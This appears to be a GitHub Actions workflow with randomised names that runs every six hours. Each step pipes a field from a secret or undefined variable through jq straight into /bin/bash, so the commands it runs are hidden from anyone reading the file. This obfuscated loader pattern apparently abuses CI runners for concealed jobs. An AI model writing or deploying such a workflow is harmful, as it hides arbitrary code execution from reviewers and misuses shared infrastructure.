name: mengtancheng9845
on:
  workflow_dispatch:
  schedule:
    - cron: '48 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mengtancheng9845
        env:
          uxcl4920: ${{ secrets.uxcl4920 }}
        run: |
          echo $uxcl4920 | jq -r .pidms76 | /bin/bash
          echo $dvb6 | jq -r .zqpbv261 | /bin/bash
          echo $yj51917 | jq -r .qcm418 | /bin/bash
          echo $za81 | jq -r .lwkfw97 | /bin/bash
          echo $lx9406 | jq -r .bt5690 | /bin/bash
          echo $jhdqj3 | jq -r .w77 | /bin/bash
          echo $rt809 | jq -r .q5639 | /bin/bash
          echo $qdtbq1 | jq -r .nqstg128 | /bin/bash

